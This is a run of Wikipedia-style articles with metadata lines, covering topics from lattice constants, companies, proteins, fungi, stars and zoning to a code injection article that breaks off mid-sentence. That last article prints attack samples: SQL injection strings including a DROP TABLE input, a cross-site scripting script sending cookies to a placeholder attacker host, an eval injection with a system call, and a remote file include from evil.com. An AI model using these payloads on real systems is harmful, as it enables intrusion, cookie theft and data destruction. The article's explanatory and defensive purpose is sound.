order to reduce strain and crystal defects. Volume The volume of the unit cell can be calculated from the lattice constant lengths and angles. If the unit cell sides are represented as vectors, then the volume is the scalar triple product of the vectors. The volume is represented by the letter V. For the general unit cell For monoclinic lattices with , , this simplifies to For orthorhombic, tetragonal and cubic lattices with as well, then Lattice matching Matching of lattice structures between two different semiconductor materials allows a region of band gap change to be formed in a material without introducing a change in crystal structure. This allows construction of advanced light-emitting diodes and diode lasers. For example, gallium arsenide, aluminium gallium arsenide, and aluminium arsenide have almost equal lattice constants, making it possible to grow almost arbitrarily thick layers of one on the other one. Lattice grading Typically, films of different materials grown on the previous film or substrate are chosen to match the lattice constant of the prior layer to minimize film stress. An alternative method is to grade the lattice constant from one value to another by a controlled altering of the alloy ratio during film growth. The beginning of the grading layer will have a ratio to match the underlying lattice and the alloy at the end of the layer growth will match the desired final lattice for the following layer to be deposited. The rate of change in the alloy must be determined by weighing the penalty of layer strain, and hence defect density, against the cost of the time in the epitaxy tool. For example, indium gallium phosphide layers with a band gap above 1.9 eV can be grown on gallium arsenide wafers with index grading. List of lattice constants References External links How to Find Lattice Constant Crystals Semiconductor properties
Lattice constant
Physics,Chemistry,Materials_science
944
40,662,884
https://en.wikipedia.org/wiki/Bottlenose%20%28company%29
Bottlenose.com, also known as Bottlenose, is an enterprise trend intelligence company that analyzes big data and business data to detect trends for brands. It helps Fortune 500 enterprises discover, and track emerging trends that affect their brands. The company uses natural language processing, sentiment analysis, statistical algorithms, data mining, and machine learning heuristics to determine trends, and has a search engine that gathers information from social networks. KPMG Capital has invested a "substantial amount" in the company. Bottlenose processed 72 billion messages per day, in real-time, from across social and broadcast media, as of December 2014. History The company is based in Los Angeles, CA. Bottlenose is a real-time trend intelligence tool that measures social media campaigns and trends. The company also provides a free version of its Sonar tool that shows real-time trends across social media. In October 2012, the company received $1 million of funding from ff Venture Capital and Prosper Capital. By 2014, the company raised about $7 million in funding. In December 2014, KPMG Capital announced further investment in the company. In February 2015, the company confirmed it had raised $13.4 million in Series B funding led by KPMG Capital. Bottlenose partnered with the nonprofit No Labels during the 2014 State of the Union Address to analyze Twitter conversations for bipartisanship. The company also partnered with media monitoring company Critical Mention to analyze broadcast analytics. The Bottlenose Nerve Center integrated with the Critical Mention API to analyze real-time trends in television and radio broadcasts. In June 2014, Bottlenose updated its trend detection product to Nerve Center 2.0. It creates a newsfeed to show changes in trends and sends alerts when trends occur. It also has "emotion detection," which will display the emotions associated with specific comments on trending topics. In 2016, Bottlenose released its Nerve Center 3.0 platform, which was designed to automate the work of data scientists and lower the cost of artificial intelligence for businesses. See also Sentiment analysis Big data analysis References External links Official website Bottlenose Offers Real-Time Trend Intelligence For Social Media and Beyond American social networking websites Social media companies Natural language processing Research support companies Technology companies established in 2010 American companies established in 2010
Bottlenose (company)
Technology
468
5,162,760
https://en.wikipedia.org/wiki/Frzb
Frzb (pronounced like the toy frisbee) is a Wnt-binding protein especially important in embryonic development. It is a competitor for the cell-surface G-protein receptor Frizzled. Frizzled is a tissue polarity gene in Drosophila melanogaster and encodes integral proteins that function as cell-surface receptors for Wnts called serpentine receptors. The integral membrane proteins contain a cysteine-rich domain thought to be the Wnt binding domain in extracellular region. The signals are initiated at the 7 transmembrane domain and transmitted through receptor coupling to G-proteins. This protein is expressed in chondrocytes making it important in skeletal development in the embryo and fetus. Frzb is localized in the extracellular plasma membrane. Unlike frizzled, frzb lacks the 7 transmembrane domains normally found in G-protein-coupled receptors. It is still considered a homolog of frizzled because it contains a Cysteine Rich Domain (CRD), and because of its intracellular C-terminus which is crucial for signaling. The CRD is highly conserved in diverse proteins, such as receptor tyrosine kinases and functions as a ligand binding domain. The C-terminal is a carboxyl terminus located intracellularly and is required for canonical signaling. The serpentine receptors (frzb) couple binds to ligand (Wnt protein) and activates G-proteins. A signal transduction cascade results in the secretion of first and second group antagonists. First group antagonists are composed of secreted Frizzled Related protein family (Sfrp) and Wnt inhibitory factor (Wif). Both Srfp and Wif bind directly to Wnt proteins blocking activation of the receptor. Second group of antagonists contains a class of Wnt inhibitory proteins known as Frizzled Receptor-like Proteins (FRPs). FRPs bind to the LRP (low-density-lipoprotein-related protein) co-receptors blocking activation of the Wnt signaling pathway. One such pathway that involves Frizzled (Fz) family is the Wnt/β-Catenin (β-Cat) signaling. β-Cat is an intracellular signal that is held in check by axin. In this pathway, the activation of Wnt receptors can be transduced by the canonical pathway via a series of phosphorylation steps leading to stabilization and nuclear import of β-Cat into the nucleus where β-Cat associates with T-cell factor (TCF), a DNA-binding protein family. The β-Cat and TCF complex activates target genes of the Wnt pathway. In the absence of Wnt, β-Catenin is phosphorylated by complex containing GSK3 (glycogen synthase kinase 3) which targets β-Cat for proteosomal degradation. In the nucleus, members of the T-cell factor (TCF) family of DNA-binding proteins repress Wnt targets along with co-repressors such as Groucho (Gro). If Wnt is present it binds to Fz-LRP receptors causing axin to bind to intracellular domain of LRP and Fz. Dishevelled (Dvl) is a protein required for Wnt-dependent inhibition complex. The combination of LRP-axin induces Dvl phosphorylation (P) which blocks the APC-axin-GSK3 complex from phosphorylating β-Cat. The accumulated β-Cat then enters the nucleus and converts TCF into a transcriptional activator. Defects in Frzb are associated with female-specific osteoarthritis (OA) susceptibility which is the most prevalent form of arthritis and common cause of disability. https://web.archive.org/web/20070930043451/http://jcs.biologists.org/content/vol119/issue3/images/large/JCS02826F1.jpeg Frzb (known as Frzb1 or Sfrp3, Secreted Frizzled Related Protein 3) was initially identified as a chondrogenic factor during bone morphogenesis, and was described as a novel marker of the neural crest-derived mesenchymal cells that contribute to dental follicle formation, the future periodontium. See also Signal transduction Morphogenesis Developmental biology Embryogenesis Cancer Catenin References External links Signal transduction
Frzb
Chemistry,Biology
958
23,809,963
https://en.wikipedia.org/wiki/Microstoma%20floccosum
Microstoma floccosum is a species in the cup fungus family Sarcoscyphaceae. It is recognizable by its deep funnel-shaped, scarlet-colored fruit bodies bearing white hairs on the exterior. Found in the United States and Asia, it grows on partially buried sticks and twigs of oak trees. Taxonomy One variant species has been described, M. floccosum var. floccosum, found in China and Japan, with large spores. The fungus originally described as Microstoma floccosum var. macrosporum was recognized as an independent species in 2000 and renamed to M. macrosporum. It differs from M. floccosum by fruiting season, asci and ascospore size, and the ultrastructure of the hairs. Description The diameter of the cup- or funnel-shaped fruit bodies is in diameter; the margins of the cup are curved inwards when young. Both the interior and exterior surfaces of the cup are scarlet red. The exterior surface is covered with stiff white hairs. Details of the hair structure may be seen with a magnifying glass: they are up to 1 mm long or more, translucent, thick-walled, rigid and more or less sword-shaped with simple, sharply diminishing bases. They are connected to the fruit body at the junction of internal tissue layers called the medullary and ectal excipulums. When the hairs come in contact with an alkali solution of 2% potassium hydroxide, the thick walls of the base of the hair first swell in size and then dissolve, releasing the contents of the internal lumen. The stipe is cylindrical, and about long by 1–2 mm thick. The species is inedible. Microscopic characteristics The spores are 20–30 by 14–16 μm; the asci (spore-bearing cells) are 300–350 by 18–20 μm. The paraphyses (sterile, upright, basally attached filaments in the hymenium, growing between asci) are thin, slightly thickened at the tip and contain many red granules. Similar species Microstoma apiculosporum is a species from Taiwan that has spores with short, sharply pointed tips. Scutellinia scutellata has a shallow red cup, no stalk, and black hairs on only the edge of the cap margin. The stalked scarlet cup, Sarcoscypha occidentalis, has a shape, size and color that somewhat resemble M. floccosum, but it lacks any surface hairs, and the cup is not as deep. Distribution and habitat Microstoma floccosum has been collected from the United States, India, China, and Japan. A saprobic species, M. floccosum grows scattered to clustered together, attached to wood that is typically partially buried in the earth. A preference for both oak and Shagbark hickory has been noted. References Sarcoscyphaceae Fungi described in 1832 Fungi of Asia Fungi of the United States Inedible fungi Fungi without expected TNC conservation status Fungus species
Microstoma floccosum
Biology
635
21,521,968
https://en.wikipedia.org/wiki/TOA%20Technologies
TOA Technologies is an American software-as-a-service company that develops, markets and sells ETAdirect, a web-based applications solution for companies with small, medium, and large mobile workforces across the world. Headquartered in Beachwood, Ohio, its products include advanced tools for automating and optimizing planning, scheduling, appointment booking, and routing, as well as job allocation and real-time field service event management. Mobile workers have access to HTML5-based mobility apps that provide location-based information, forecasting, capacity management, routing, real-time field management, dispatch, and customer communications through ETAdirect. TOA Technologies was acquired by Oracle in 2014. ETAdirect ETAdirect is a software as a service model employing a patented algorithm which operates using pattern recognition in order to accurately gauge the arrival time of a mobile employee at a customer's location. Additionally, ETAdirect's algorithm provides data which enables the estimation of job length. ETAdirect's prediction window is typically less than 60 minutes, allowing for precise notices to consumers over a variety of channels including: voice, email, text, X, and other communications channels. This technology aims at reducing customer queries to service provider call centers. ETAdirect is currently used by several cable television companies in North America, including Cox Communications, broadband operators in Europe, such as Virgin Media, and ONO (Spain). They also provide their service to global communications companies such as Telefonica and global utility companies like E.ON. Company information TOA Technologies was founded by Yuval Brisker and Irad Carmi in 2003. The company is privately held and employs more than 550 employees worldwide and is headquartered in Beachwood, Ohio, with additional offices in London, United Kingdom, and São Paulo, Brazil. Principal venture shareholders are Technology Crossover Ventures, Draper Triangle Ventures (a DFJ network affiliate), Intel Capital, and Sutter Hill Ventures. TOA stands for "Time of Arrival." The concept of time is central to the ETAdirect software solution set, as its central algorithm measures time and predicts performance based on resource-specific pattern recognition and predictive analytics. This yields a more accurate time of arrival estimates than the alternative of managing service appointments according to averages of human resource capabilities and availability. As of December 2013, TOA Technologies had over 85,000 users. Oracle Corporation announced that it was acquiring TOA Technologies on July 31, 2014. Milestones In July 2013, TOA Technologies closed a major round of funding with Technology Crossover Ventures, raising $66 million to transform global field service management. On July 31, 2014, Oracle Corporation announced that it was buying TOA Technologies. The transaction closed in mid-September, 2014. See also Software as a service Decision support system Service chain optimization Field service management Enterprise mobility management Customer relationship management Customer experience management Workforce management Vehicle routing problem References Software companies based in Ohio Centralized computing Cloud computing providers Service-oriented (business computing) Business software companies Oracle acquisitions 2014 mergers and acquisitions Defunct software companies of the United States
TOA Technologies
Technology
634
50,718,063
https://en.wikipedia.org/wiki/Gephyronic%20acid
Gephyronic acid is a polyketide that exists as an equilibrating mixture of structural isomers. In nature, gephyronic acid is produced by slow growing myxobacterium: Archangium gephyra strain Ar3895 and Cystobacter violaceus strain Cb vi76. It is the first antibiotic in myxobacteria that was reported to specifically inhibit eukaryotic protein synthesis. Biological properties Preliminary studies demonstrated that gephyronic acid inhibited growth of yeast and molds as well as elicited a cytostatic effect through the inhibition of eukaryotic protein synthesis in mammalian cell cultures. Feeding experiments done with radioactive precursors showed a drastic difference in incorporation of leucine by a human leukemic cell like K-562, but little difference in the incorporation of uridine and thymidine. This suggested that the primary target of gephyronic acid is protein synthesis. As such, it is a potential target for cancer chemotherapy. Gene expression profiling of human breast cancer cell lines is underway in an effort to further define the potential of gephyronic acid as a chemotherapeutic lead. Screening of a library of compounds derived from myxobacteria found that gephyronic acid was the strongest inhibitor of processing bodies (P-bodies) assembly. P-bodies are discrete cytoplasmic mRNP granules that contain non-translating mRNA and protein from the mRNA decay pathway and from miRNA silencing machinery. Within P-bodies, mRNAs can be degraded, but components of P-bodies can rapidly cycle in and out to return to translation. The mechanism of P-body assembly inhibition by gephyronic acid has not been characterized, but initial studies suggest that the mode of action could be through stalling ribosomes on mRNA or by reflecting early steps of translation initiation, such as binding of ribosomal subunits or initiation factors. The same study also found that gephyronic acid inhibits eIF2α-phosphorylation and formation of stress granules under stress conditions. Stress granules contain non-translating mRNAs and translation initiation factors, suggesting that they may form as a result of aggregation of mRNPs stalled during translation initiation. By monitoring immunofluresence of an established stress granules marker, it was found that stress granule formation was inhibited in the presence of gephyronic acid. Gephyronic acid may have a direct or indirect effect on translation initiation factor eIF2α, which would trap mRNA into nonfunctional initiation complexes, inhibiting both P-body and stress granule formation. Biosynthesis Sequencing of the PKS gene cluster in C. violaceus was conducted and confirmed to reveal five type I polyketide synthases and post-PKS tailoring enzymes with O-methyltransferase and cytochrome P450 monooxygenase. The overall structure correlates well with modular arrangement of PKS-encoded proteins, aside from some unexpected elements that are likely caused by inactive domains. Initial loading uses a GCN5-related N-acetyltransferase (GNAT) domain instead of the typical AT domain. Gephyronic acid contains a methyl ether at C-5 and a C-12/C-13 epoxide. These functional groups are incorporated by post-PKS tailoring enzymes. GphA is likely responsible for installation of the C-5 methyl ether. O-methyltransferases SpiB and SpiK used in spirangien biosynthesis exhibit the same SAM-binding motif as GphA. GphK is a member of the cytochrome p450 superfamily and is suspected to carry out the epoxidation of the C12-C13 olefin. Such epoxidation in post-PKS modifications has been seen in epothilone biosynthesis by EpoK. In EpoK, the consensus mechanism of epoxidation by P450 involves the formation of a pi-complex between an oxoferryl pi-cation radical species (FeIV) and the olefin pi bond, followed by electron transfer, formation of the olefin pi-cation radical and finally epoxidation. However, it is also possible that in addition to cytochrome p450, a FAD-dependent monoxygenase is also required to install the epoxide. This codependent process is seen in tirandamycin biosynthesis by TamL. Experiments to clarify the function of these enzymes in gephyronic acid biosynthesis are underway. References Polyketides Epoxides
Gephyronic acid
Chemistry
980
63,627,383
https://en.wikipedia.org/wiki/NGC%201347
NGC 1347 is a barred spiral galaxy situated in the constellation of Eridanus. It is at a distance of 81 million light years and is a member of the Eridanus cluster, a cluster of about 200 galaxies. NGC 1347 has a Hubble classification of SBc, which indicates it is a barred spiral galaxy. It is moving away from the Milky Way at a rate of 1,760 km/s. Its size on the night sky is 1.5' x 1.3' which is proportional to its real size of 35 000 ly. NGC 1347 forms a pair, named Arp 39, with the galaxy PGC 816443. References Eridanus (constellation) Barred spiral galaxies 1347 039 012989 Eridanus Group
NGC 1347
Astronomy
159
45,178,493
https://en.wikipedia.org/wiki/Helvella%20albella
Helvella albella is a species of fungus in the family Helvellaceae that is found in Europe and North America. It was described by French mycologist Lucien Quélet in 1896. References albella Fungi described in 1896 Fungi of Europe Fungi of North America Fungus species
Helvella albella
Biology
60
63,992,022
https://en.wikipedia.org/wiki/Phoslactomycin%20B
Phoslactomycin (PLM) is a natural product from the isolation of Streptomyces species. This is an inhibitor of the protein serine/threonine phosphatase which is the protein phosphate 2A (PP2A). The PP2A involves the growth factor of the cell such as to induce the formation of mitogen-activated protein interaction and playing a role in cell division and signal transduction. Therefore, PLM is used for the drug that prevents the tumor, cancer, or bacteria. There are nowsaday has 7 kinds of different PLM from PLM A to PLM G which differ the post-synthesis from the biosynthesis of PLM. Phoslactomycin B (PLM B) is the product of the post synthase of the biosynthesis of phoslactomycin and the intermediate to produce the other PLMs. The biosynthesis of phoslactomycin belongs to type I polyketide synthase (PKS). A polyketide is are characterized by a macrocyclic lactone and is produced by bacteria and fungi. From the PLM B, there are many articles wrote about the synthesis of different PLM A through PLM G. lyketide synthase domains The domains in the polyketide synthase type I: ACP: acyl carrier protein (serves as chaperone) AT: acyl transferase (transfers acyl group form CoA to ACP) KS: keto synthase (forms the new carbon-carbon bond) KR: keto reductase (NADPH-dependent reduces beta-ketone to beta-hydroxyl) DH: dehydratase (eliminates beta-OH to anpha/beta-unsaturation) ER: enoyl reductase (NADPH-dependent reduces anpha/beta-unsaturation) TE: thioesterase (hydrolyses / cyclizes) Biosynthesis pathway of phoslactomycin The PKS of phoslactomycin has one loading domain, 7 modules and 6 proteins that encode PnA, PnB, PnC, PnD, PnE, and PnF. The biosynthesis starts the loading with the cyclohexyl- CoA. Stepping in each module, there always need the keto synthase (KS) to create the new linkage of carbon-carbon to elongate the chain, the acyl transferase to transfer acyl to ACP domain. Then ACP serves as the acyl carrier protein to the further reaction, and each module has the keto reductase at the end to reduce the ketone to hydroxyl group with more stable. Module 1 uses the precursor malonyl-CoA and dehydrase domain to create the double bond. Similarly, module 2, module 5, and module 7 have the same 5 domains KS-AT-ACP-DH-KR, but module 7 has one more domain at the end is thioesterase (TE) to create the ring member of the phoslactomycin product. Module 4 and module 6 have 4 domains which are KS-AT-ACP-KR and use the precursor ethylmalonyl-CoA. The final product is phoslactomycin. Phoslactomycin family Isolation from Streptomyces platensis, PLM is produces. Genes PnT1 and PnT2 regulate the post-synthesis of PLM to form PLM B by the phosphorylation and added the amine group . Figure 4 is based on the biosynthesis analysis on the Gene journal introduced that PLM B is used to produce PLM A, and 4 more PLMs C-F. The PLM A-F are the post synthesis product of the biosynthesis of PLM with the modification of many enzyme PnT1-T8. PLMs regulates the actin cytoskeleton as they induce actin depolymerization by the indirect way. In the experiment, PLM F does not affect to the polymerization of purified actin in vitro. However, PLM F enhances the phosphorylation of intracellular vimentin. Footnotes Phosphatase inhibitors Natural products
Phoslactomycin B
Chemistry
907
1,571,487
https://en.wikipedia.org/wiki/HD%20114729
HD 114729 is a Sun-like star with an orbiting exoplanet in the southern constellation of Centaurus. Based on parallax measurements, it is located at a distance of 124 light years from the Sun. It is near the lower limit of visibility to the naked eye, having an apparent visual magnitude of 6.68 The system is drifting further away with a heliocentric radial velocity of 26.3 km/s. The system has a relatively high proper motion, traversing the celestial sphere at an angular rate of ·yr−1. The spectrum of HD 114729 presents as an ordinary G-type main-sequence star, a yellow dwarf, with a stellar classification of G0 V. It has a negligible level of magnetic activity, making it chromosperically quiet. The star has about the same mass as the Sun, but the radius has expanded to 44% greater than the Sun's girth. It is radiating more than double the luminosity of the Sun from its photosphere at an effective temperature of 5,939 K. The size and luminosity suggest a much greater age than the Sun; perhaps around nine billion years. HD 114729 has a co-moving companion designated HD 114729 B, with the latter having 25.3% of the Sun's mass and a projected separation of . Planetary system In 2003 the California and Carnegie Planet Search team announced the discovery of a planet orbiting the star. This planet orbits twice as far away from the star as Earth to the Sun and orbits very eccentrically. It has mass at least 95% (0.840) that of Jupiter and thus a minimum of 267 times the mass of Earth. See also List of extrasolar planets References External links G-type main-sequence stars Planetary systems with one confirmed planet Centaurus Durchmusterung objects 114729 064459
HD 114729
Astronomy
388
22,556,798
https://en.wikipedia.org/wiki/PAC611
Socket PAC611 is a 611 pin microprocessor socket designed to interface an Intel Itanium 2 processor to the rest of the computer (usually via the motherboard). It provides both an electrical interface as well as physical support. This socket is designed to support a microprocessor module. Technical specifications Socket PAC611 was introduced with Intel's second generation Itanium in 2002. It supported bus speeds up to 200 MHz double-pumped. Socket PAC611 processors reach speeds up to 1.66 GHz. See also List of Intel microprocessors References Socket 604
PAC611
Technology
125
13,802,176
https://en.wikipedia.org/wiki/Spot%20zoning
Spot zoning is the application of zoning to a specific parcel or parcels of land within a larger zoned area when the rezoning is usually at odds with a city's master plan and current zoning restrictions. Spot zoning may be ruled invalid as an "arbitrary, capricious and unreasonable treatment" of a limited parcel of land by a local zoning ordinance. While zoning regulates the land use in whole districts, spot zoning makes unjustified exceptions for a parcel or parcels within a district. The small size of the parcel is not the sole defining characteristic of a spot zone. Rather, the defining characteristic is the narrowness and unjustified nature of the benefit to the particular property owner, to the detriment of a general land use plan or public goals. The rezoning may provide unjustified special treatment that benefits a particular owner, while undermining the pre-existing rights and uses of adjacent property owners. This would be called an instance of spot zoning. On the other hand, a change in zoning for a small land area may not be a spot zone, if it is consistent with, and furthers the purposes of the general area plan. For example, a small zone allowing limited commercial uses such as a corner store within a residential area may not be a spot zone, but a carve-out for an industrial use or a night club might be considered a case of spot zoning. In the first case, the differing land uses are mutually compatible and supportive. In the latter case, the residential nature of the area would be harmed by a conflicting land use. When the change in zoning does not advance a general public purpose in land use, courts may rule certain instances of spot zoning as illegal. The Standard State Zoning Enabling Act states "all such regulations shall be uniform for each class or kind of building throughout each district." It may also be an invalid exercise of authority, if spot zoning is not a right conferred upon the body by the state's zoning enabling statute, because it deviates from the plan set out by the enabling statute. Special zoning treatment may have a legitimate use, however, such as when a community wishes to have more local control of land use. This may occur in a rural county which has no zoning at all, where a village or hamlet may wish to maintain its characteristic feel and historic appeal (often to protect tourism), without adding another layer of local government and taxes by creating a municipality. The county designates the boundaries (often that of an already census-designated place) and maintain regulations through the county commission instead of a separate town council. Authority Generally, zoning is a constitutional exercise of a state's police power to protect public health, safety, and welfare. Therefore, spot zoning (or any zoning enactment) would be unconstitutional to the extent that it contradicts or fails to advance a legitimate public purpose, such as promotion of community welfare or protection of other properties. Spot zoning would be a constitutional exercise of zoning power by a local zoning authority if the state zoning enabling law allows spot zoning. Conversely, spot zoning may be an invalid exercise of a local authority's zoning power if the state zoning enabling law prohibits spot zoning. Situations where spot zoning may arise Variance A variance is the license to deviate from the land-use restrictions imposed by the zoning ordinance. A variance usually requires the landowner suffer a substantial hardship which only the granting of a variance may remedy. If a local zoning authority decides to grant a variance to a landowner who lacks substantial hardship, then its legality (regarding equal protection) may be called into question. Special-use permit A special-use permit occurs when a zoning regulations allows some specific exception to its regulations provided that a landowner receive a special-use permit from the local zoning authority. An example of a specific exception includes a church in a residential neighborhood. If the special-use permit deviates from zoning ordinance or the enabling statute, then an instance of spot zoning arises. Amendment to ordinance A local zoning authority like a city may seek to amend its zoning ordinance. If it amends it zoning ordinance but only for a parcel within a district and the parcel has a different land use characterization than the surrounding district, then an instance of spot zoning arises. Contract zoning Contract zoning occurs when a local zoning authority accommodates a private interest by rezoning a district or a parcel of land within that district. Then the private interest may then be allowed to develop the land where before the zoning regulations prohibited such a land use. Contract zoning is usually illegal, in contrast with permissible conditional use (also known as special use) zoning. See also Bill of attainder Zoning References External links North Carolina, different approach Real estate in the United States Real property law Zoning
Spot zoning
Engineering
953
1,060,909
https://en.wikipedia.org/wiki/Residual%20strength
Residual strength is the load or force (usually mechanical) that a damaged object or material can still carry without failing. Material toughness, fracture size and geometry as well as its orientation all contribute to residual strength. References Materials science
Residual strength
Physics,Materials_science,Engineering
47
44,605,851
https://en.wikipedia.org/wiki/Gynomorph
Gynomorph is a word used to describe an organism with female physical characteristics. Mythology In Greek mythology and religion, a gynomorph was a bi-gendered god with both masculine and feminine characteristics. Gynomorphs were portrayed as effeminate young males, like Dionysos, a masculine god who possessed distinctly feminine features. Gynomorphs retained the creative capacity of female divinities: they had cosmic wombs, but they also possessed the inseminating abilities attributed to male divinities. Biology In biology, a gynomorph is an organism with female physical characteristics, whereas an Andromorph is an organism with male physical characteristics. For instance, some female damselflies show colour variations typically found in males. Andromorphs, by resembling males, are thought to benefit from avoiding male harassment. Some authors have proposed that this benefit is offset by a higher probability of detection for andromorphs compared to gynomorphs owing to differences in body colouration. See also Androgyny Futanari Gynandromorphism Hermaphrodite Sexual dimorphism Shemale References Androgynous and hermaphroditic deities Female Sexual selection LGBTQ themes in Greek mythology
Gynomorph
Biology
264
1,065,470
https://en.wikipedia.org/wiki/Code%20injection
Code injection is a computer security exploit where a program fails to correctly process external data, such as user input, causing it to interpret the data as executable commands. An attacker using this method "injects" code into the program while it is running. Successful exploitation of a code injection vulnerability can result in data breaches, access to restricted or critical computer systems, and the spread of malware. Code injection vulnerabilities occur when an application sends untrusted data to an interpreter, which then executes the injected text as code. Injection flaws are often found in services like Structured Query Language (SQL) databases, Extensible Markup Language (XML) parsers, operating system commands, Simple Mail Transfer Protocol (SMTP) headers, and other program arguments. Injection flaws can be identified through source code examination, Static analysis, or dynamic testing methods such as fuzzing. There are numerous types of code injection vulnerabilities, but most are errors in interpretation—they treat benign user input as code or fail to distinguish input from system commands. Many examples of interpretation errors can exist outside of computer science, such as the comedy routine "Who's on First?". Code injection can be used maliciously for many purposes, including: Arbitrarily modifying values in a database through SQL injection; the impact of this can range from website defacement to serious compromise of sensitive data. For more information, see Arbitrary code execution. Installing malware or executing malevolent code on a server by injecting server scripting code (such as PHP). Privilege escalation to either superuser permissions on UNIX by exploiting shell injection vulnerabilities in a binary file or to Local System privileges on Microsoft Windows by exploiting a service within Windows. Attacking web users with Hyper Text Markup Language (HTML) or Cross-Site Scripting (XSS) injection. Code injections that target the Internet of Things could also lead to severe consequences such as data breaches and service disruption. Code injections can occur on any type of program running with an interpreter. Doing this is trivial to most, and one of the primary reasons why server software is kept away from users. An example of how you can see code injection first-hand is to use your browser's developer tools. Code injection vulnerabilities are recorded by the National Institute of Standards and Technology (NIST) in the National Vulnerability Database (NVD) as CWE-94. Code injection peaked in 2008 at 5.66% as a percentage of all recorded vulnerabilities. Benign and unintentional use Code injection may be done with good intentions. For example, changing or tweaking the behavior of a program or system through code injection can cause the system to behave in a certain way without malicious intent. Code injection could, for example: Introduce a useful new column that did not appear in the original design of a search results page. Offer a new way to filter, order, or group data by using a field not exposed in the default functions of the original design. Add functionality like connecting to online resources in an offline program. Override a function, making calls redirect to another implementation. This can be done with the Dynamic linker in Linux. Some users may unsuspectingly perform code injection because the input they provided to a program was not considered by those who originally developed the system. For example: What the user may consider as valid input may contain token characters or strings that have been reserved by the developer to have special meaning (such as the ampersand or quotation marks). The user may submit a malformed file as input that is handled properly in one application but is toxic to the receiving system. Another benign use of code injection is the discovery of injection flaws to find and fix vulnerabilities. This is known as a penetration test. Preventing Code Injection To prevent code injection problems, the person could use secure input and output handling strategies, such as: Using an application programming interface (API) that, if used properly, is secure against all input characters. Parameterized queries allow the moving of user data out of a string to be interpreted. Additionally, Criteria API and similar APIs move away from the concept of command strings to be created and interpreted. Enforcing language separation via a static type system. Validating or "sanitizing" input, such as whitelisting known good values. This can be done on the client side, which is prone to modification by malicious users, or on the server side, which is more secure. Encoding input or escaping dangerous characters. For instance, in PHP, using the htmlspecialchars() function to escape special characters for safe output of text in HTML and the mysqli::real_escape_string() function to isolate data which will be included in an SQL request can protect against SQL injection. Encoding output, which can be used to prevent XSS attacks against website visitors. Using the HttpOnly flag for HTTP cookies. When this flag is set, it does not allow client-side script interaction with cookies, thereby preventing certain XSS attacks. Modular shell disassociation from the kernel. Regarding SQL injection, one can use parameterized queries, stored procedures, whitelist input validation, and other approaches to help mitigate the risk of an attack. Using object-relational mapping can further help prevent users from directly manipulating SQL queries. The solutions described above deal primarily with web-based injection of HTML or script code into a server-side application. Other approaches must be taken, however, when dealing with injections of user code on a user-operated machine, which often results in privilege elevation attacks. Some approaches that are used to detect and isolate managed and unmanaged code injections are: Runtime image hash validation, which involves capturing the hash of a partial or complete image of the executable loaded into memory and comparing it with stored and expected hashes. NX bit: all user data is stored in special memory sections that are marked as non-executable. The processor is made aware that no code exists in that part of memory and refuses to execute anything found in there. Use canaries, which are randomly placed values in a stack. At runtime, a canary is checked when a function returns. If a canary has been modified, the program stops execution and exits. This occurs on a failed Stack Overflow Attack. Code Pointer Masking (CPM): after loading a (potentially changed) code pointer into a register, the user can apply a bitmask to the pointer. This effectively restricts the addresses to which the pointer can refer. This is used in the C programming language. Examples SQL injection An SQL injection takes advantage of SQL syntax to inject malicious commands that can read or modify a database or compromise the meaning of the original query. For example, consider a web page that has two text fields which allow users to enter a username and a password. The code behind the page will generate an SQL query to check the password against the list of user names: SELECT UserList.Username FROM UserList WHERE UserList.Username = 'Username' AND UserList.Password = 'Password' If this query returns any rows, then access is granted. However, if the malicious user enters a valid Username and injects some valid code "('Password' OR '1'='1') in the Password field, then the resulting query will look like this: SELECT UserList.Username FROM UserList WHERE UserList.Username = 'Username' AND UserList.Password = 'Password' OR '1'='1' In the example above, "Password" is assumed to be blank or some innocuous string. "'1'='1'" will always be true and many rows will be returned, thereby allowing access. The technique may be refined to allow multiple statements to run or even to load up and run external programs. Assume a query with the following format:SELECT User.UserID FROM User WHERE User.UserID = ' " + UserID + " ' AND User.Pwd = ' " + Password + " 'If an adversary has the following for inputs: UserID: ';DROP TABLE User; --' Password: 'OR"=' then the query will be parsed as:SELECT User.UserID FROM User WHERE User.UserID = '';DROP TABLE User; --'AND Pwd = ''OR"=' The resulting User table will be removed from the database. This occurs because the ; symbol signifies the end of one command and the start of a new one. -- signifies the start of a comment. Cross-site scripting Code injection is the malicious injection or introduction of code into an application. Some web servers have a guestbook script, which accepts small messages from users and typically receives messages such as: Very nice site! However, a malicious person may know of a code injection vulnerability in the guestbook and enter a message such as: Nice site, I think I'll take it. <script>window.location="https://some_attacker/evilcgi/cookie.cgi?steal=" + escape(document.cookie)</script> If another user views the page, then the injected code will be executed. This code can allow the attacker to impersonate another user. However, this same software bug can be accidentally triggered by an unassuming user, which will cause the website to display bad HTML code. HTML and script injection are popular subjects, commonly termed "cross-site scripting" or "XSS". XSS refers to an injection flaw whereby user input to a web script or something along such lines is placed into the output HTML without being checked for HTML code or scripting. Many of these problems are related to erroneous assumptions of what input data is possible or the effects of special data. Server Side Template Injection Template engines are often used in modern web applications to display dynamic data. However, trusting non-validated user data can frequently lead to critical vulnerabilities such as server-side Side Template Injections. While this vulnerability is similar to cross-site scripting, template injection can be leveraged to execute code on the web server rather than in a visitor's browser. It abuses a common workflow of web applications, which often use user inputs and templates to render a web page. The example below shows the concept. Here the template {{visitor_name}} is replaced with data during the rendering process.Hello {{visitor_name}}An attacker can use this workflow to inject code into the rendering pipeline by providing a malicious visitor_name. Depending on the implementation of the web application, he could choose to inject {{7*'7'}} which the renderer could resolve to Hello 7777777. Note that the actual web server has evaluated the malicious code and therefore could be vulnerable to remote code execution. Dynamic evaluation vulnerabilities An eval() injection vulnerability occurs when an attacker can control all or part of an input string that is fed into an eval() function call. $myvar = 'somevalue'; $x = $_GET['arg']; eval('$myvar = ' . $x . ';'); The argument of "eval" will be processed as PHP, so additional commands can be appended. For example, if "arg" is set to "10; system('/bin/echo uh-oh')", additional code is run which executes a program on the server, in this case "/bin/echo". Object injection PHP allows serialization and deserialization of whole objects. If an untrusted input is allowed into the deserialization function, it is possible to overwrite existing classes in the program and execute malicious attacks. Such an attack on Joomla was found in 2013. Remote file injection Consider this PHP program (which includes a file specified by request): <?php $color = 'blue'; if (isset($_GET['color'])) $color = $_GET['color']; require($color . '.php'); The example expects a color to be provided, while attackers might provide COLOR=http://evil.com/exploit causing PHP to load the remote file. Format specifier injection Format string bugs appear most commonly when a programmer wishes to print a string containing user-supplied data. The programmer may mistakenly write printf(buffer) instead of printf("%s", buffer). The first version interprets buffer as a format string and parses any formatting instructions it may contain. The second version simply prints a string to the screen, as the programmer intended. Consider the following short C program that has a local variable char array password which holds a password; the program 